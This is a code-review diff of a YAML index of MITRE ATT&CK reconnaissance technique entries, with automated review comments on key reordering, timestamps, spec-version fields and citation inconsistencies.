+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
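Review bot: most of this hunk is key reordering rather than content: `modified`/`name`/`description` now come before `x_mitre_domains`, `id` moves below `type`, and the `url`/`external_id` order inside the mitre-attack and ATT ScanBox references flips, so a small upstream change (x_mitre_version 1.1 to 1.2, the new User-Agent paragraph with its TrellixQakbot citation, one new contributor, `revoked: false`) shows up as a near-complete rewrite of the block. If this index is emitted from the STIX bundle, have the generator dump with a stable key order (for PyYAML, `sort_keys=True` on `safe_dump`, assuming that is the library in use) so regenerated indexes only diff where the data actually changed.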
@@ -66052,7 +66729,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
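Review bot: the `modified` timestamp on T1596.003 goes backwards, from `2022-04-25T14:00:00.188Z` to `2021-04-15T03:48:37.628Z`, with no change to the object's content in this hunk, and the same backward move appears below for T1597.002, T1590.005, T1596.002, T1596.001, T1591.003, T1592.001, T1590.004, T1590.003, T1597.001, T1590.006 and T1595. Verify that the upstream bundle really carries the older timestamps (i.e. the 2022-04-25 mass-touch was reverted upstream) rather than the generator having been run against a stale or mixed source; a consumer that syncs incrementally on `modified` would otherwise treat these records as already seen.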
@@ -66068,8 +66745,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
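Review bot: dropping both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` leaves T1596.003 (and, in the later hunks, T1597.002, T1590.005, T1596.002, T1596.001, T1591.003, T1592.001, T1590.004, T1590.003, T1597.001, T1595 and T1590.006) with no spec-version marker at all, while T1596 and T1589.002 further down keep `x_mitre_attack_spec_version: 2.1.0` and lose only `spec_version`. `spec_version` is a required property on STIX 2.1 objects, so anything that validates these records as STIX will reject them after this change; confirm the index is consumed purely as YAML, and make the handling of `x_mitre_attack_spec_version` consistent across objects either way.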
@@ -66091,7 +66766,7 @@ reconnaissance:
url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:44:43.900Z'
name: Purchase Technical Data
description: |-
Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
@@ -66107,8 +66782,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.005:
technique:
@@ -66136,7 +66809,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:05.302Z'
name: IP Addresses
description: |-
Adversaries may gather the victim's IP addresses that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Information about assigned IP addresses may include a variety of details, such as which IP addresses are in use. IP addresses may also enable an adversary to derive other details about a victim, such as organizational size, physical location(s), Internet service provider, and or where/how their publicly-facing infrastructure is hosted.
@@ -66152,33 +66825,33 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.002:
technique:
- modified: '2022-10-21T14:32:48.393Z'
+ modified: '2024-11-11T16:13:02.196Z'
name: DNS
description: |-
- Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
+ Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.(Citation: Sean Metcalf Twitter DNS Records)
Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://attack.mitre.org/techniques/T1596/001). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Active Scanning](https://attack.mitre.org/techniques/T1595)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also use DNS zone transfer (DNS query type AXFR) to collect all records from a misconfigured DNS server.(Citation: Trails-DNS)(Citation: DNS-CISA)(Citation: Alexa-dns)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--0ff59227-8aa8-4c09-bf1f-925605bd07ea
created: '2020-10-02T15:47:10.102Z'
@@ -66192,18 +66865,29 @@ reconnaissance:
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
url: https://www.circl.lu/services/passive-dns/
+ - source_name: DNS-CISA
+ description: CISA. (2016, September 29). DNS Zone Transfer AXFR Requests May
+ Leak Domain Information. Retrieved June 5, 2024.
+ url: https://www.cisa.gov/news-events/alerts/2015/04/13/dns-zone-transfer-axfr-requests-may-leak-domain-information
- source_name: DNS Dumpster
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
url: https://dnsdumpster.com/
+ - source_name: Alexa-dns
+ description: Scanning Alexa's Top 1M for AXFR. (2015, March 29). Retrieved
+ June 5, 2024.
+ url: https://en.internetwache.org/scanning-alexas-top-1m-for-axfr-29-03-2015/
- source_name: Sean Metcalf Twitter DNS Records
description: Sean Metcalf. (2019, May 9). Sean Metcalf Twitter. Retrieved
- May 27, 2022.
- url: https://twitter.com/PyroTek3/status/1126487227712921600/photo/1
+ September 12, 2024.
+ url: https://x.com/PyroTek3/status/1126487227712921600
+ - source_name: Trails-DNS
+ description: SecurityTrails. (2018, March 14). Wrong Bind Configuration Exposes
+ the Complete List of Russian TLD's to the Internet. Retrieved June 5, 2024.
+ url: https://web.archive.org/web/20180615055527/https://securitytrails.com/blog/russian-tlds
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.002:
technique:
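Review bot: the new DNS-CISA reference dates the alert "2016, September 29" while its URL path reads `alerts/2015/04/13`; the two cannot both be right (the path points at an April 2015 alert), so check the upstream reference before merging. Also confirm that the three new `source_name` values (DNS-CISA, Alexa-dns, Trails-DNS) match the `(Citation: ...)` tokens added to the T1590.002 description in the previous hunk character for character, since citation resolution is by exact name and an unmatched token renders verbatim.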
@@ -66224,7 +66908,7 @@ reconnaissance:
- source_name: WHOIS
url: https://www.whois.net/
description: NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:50:44.113Z'
name: WHOIS
description: |-
Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
@@ -66240,39 +66924,37 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1594:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
- type: attack-pattern
- created: '2020-10-02T16:51:50.306Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1594
- url: https://attack.mitre.org/techniques/T1594
- - source_name: Comparitech Leak
- url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
- description: Bischoff, P. (2020, October 15). Broadvoice database of more
- than 350 million customer records exposed online. Retrieved October 20,
- 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-02T18:52:21.278Z'
name: Search Victim-Owned Websites
- description: |-
- Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)
-
- Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).
+ description: "Adversaries may search websites owned by the victim for information
+ that can be used during targeting. Victim-owned websites may contain a variety
+ of details, including names of departments/divisions, physical locations,
+ and data about key employees such as names, roles, and contact info (ex: [Email
+ Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may
+ also have details highlighting business operations and relationships.(Citation:
+ Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather
+ actionable information. Information from these sources may reveal opportunities
+ for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
+ or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)),
+ establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585)
+ or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or
+ initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)
+ or [Phishing](https://attack.mitre.org/techniques/T1566)).\n\nIn addition
+ to manually browsing the website, adversaries may attempt to identify hidden
+ directories or files that could contain additional sensitive information or
+ vulnerable functionality. They may do this through automated activities such
+ as [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), as
+ well as by leveraging files such as sitemap.xml and robots.txt.(Citation:
+ Perez Sitemap XML 2023)(Citation: Register Robots TXT 2015) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - James P Callahan, Professional Paranoid
+ x_mitre_deprecated: false
x_mitre_detection: Monitor for suspicious network traffic that could be indicative
of adversary reconnaissance, such as rapid successions of requests indicative
of web crawling and/or large quantities of requests originating from a single
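Review bot: the T1594 description switches from the `|-` block scalar used by every other technique in this file to a double-quoted flow scalar with `\n\n` escapes and line-wrapped continuations, and the value now ends with a trailing space before the closing quote (`... Register Robots TXT 2015) "`). That space is part of the string and will appear in rendered output; strip it at the source, and pin a consistent scalar style (or a large `width`) in the dumper so long descriptions do not flip representation between runs.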
@@ -66280,13 +66962,41 @@ reconnaissance:
Analyzing web metadata may also reveal artifacts that can be attributed to
potentially malicious activity, such as referer or user-agent string HTTP/S
fields.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26
+ created: '2020-10-02T16:51:50.306Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1594
+ external_id: T1594
+ - source_name: Perez Sitemap XML 2023
+ description: Adi Perez. (2023, February 22). How Attackers Can Misuse Sitemaps
+ to Enumerate Users and Discover Sensitive Information. Retrieved July 18,
+ 2024.
+ url: https://medium.com/@adimenia/how-attackers-can-misuse-sitemaps-to-enumerate-users-and-discover-sensitive-information-361a5065857a
+ - source_name: Comparitech Leak
+ description: Bischoff, P. (2020, October 15). Broadvoice database of more
+ than 350 million customer records exposed online. Retrieved October 20,
+ 2020.
+ url: https://www.comparitech.com/blog/vpn-privacy/350-million-customer-records-exposed-online/
+ - source_name: Register Robots TXT 2015
+ description: Darren Pauli. (2015, May 19). Robots.txt tells hackers the places
+ you don't want them to look. Retrieved July 18, 2024.
+ url: https://www.theregister.com/2015/05/19/robotstxt/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.001:
technique:
@@ -66311,7 +67021,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:13.409Z'
name: DNS/Passive DNS
description: |-
Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.
@@ -66327,8 +67037,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.003:
technique:
@@ -66350,7 +67058,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:38:31.983Z'
name: Identify Business Tempo
description: |-
Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources.
@@ -66366,8 +67074,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.001:
technique:
@@ -66393,7 +67099,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:32:10.810Z'
name: 'Gather Victim Host Information: Hardware'
description: |-
Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -66411,13 +67117,11 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1592.001
atomic_tests: []
T1598.003:
technique:
- modified: '2024-04-19T13:26:16.082Z'
+ modified: '2024-05-31T04:18:44.567Z'
name: Spearphishing Link
description: |-
Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -66473,7 +67177,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: TrendMictro Phishing
description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
October 20, 2020.
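Review bot: the ACSC Email Spoofing reference is repointed at a web.archive.org snapshot dated 2021-07-08 but keeps `Retrieved October 19, 2020`, so the citation now claims a retrieval date earlier than the URL it cites. The OPM Leak change later in this diff updates the retrieved date together with the archive URL; do the same here so the entry is internally consistent.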
@@ -66524,7 +67228,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.004:
technique:
@@ -66545,7 +67248,7 @@ reconnaissance:
- source_name: DNS Dumpster
url: https://dnsdumpster.com/
description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:33:02.476Z'
name: Network Topology
description: |-
Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -66561,8 +67264,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590.003:
technique:
@@ -66584,7 +67285,7 @@ reconnaissance:
url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
description: García, C. (2019, April 3). Pentesting Active Directory Forests.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:22.917Z'
name: Network Trust Dependencies
description: |-
Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -66600,8 +67301,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.001:
technique:
@@ -66623,7 +67322,7 @@ reconnaissance:
url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
Intelligence Feeds. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:45:30.862Z'
name: Threat Intel Vendors
description: |-
Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -66639,12 +67338,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589:
technique:
- modified: '2024-04-19T04:27:00.005Z'
+ modified: '2024-09-16T16:09:45.794Z'
name: Gather Victim Identity Information
description: |-
Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -66684,8 +67381,8 @@ reconnaissance:
external_id: T1589
- source_name: OPM Leak
description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- source_name: Detectify Slack Tokens
description: Detectify. (2016, April 28). Slack bot token leakage exposing
business critical information. Retrieved October 19, 2020.
@@ -66730,11 +67427,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:37:31.317Z'
name: Vulnerability Scanning
description: |-
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -66774,9 +67470,8 @@ reconnaissance:
url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596:
technique:
@@ -66838,7 +67533,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
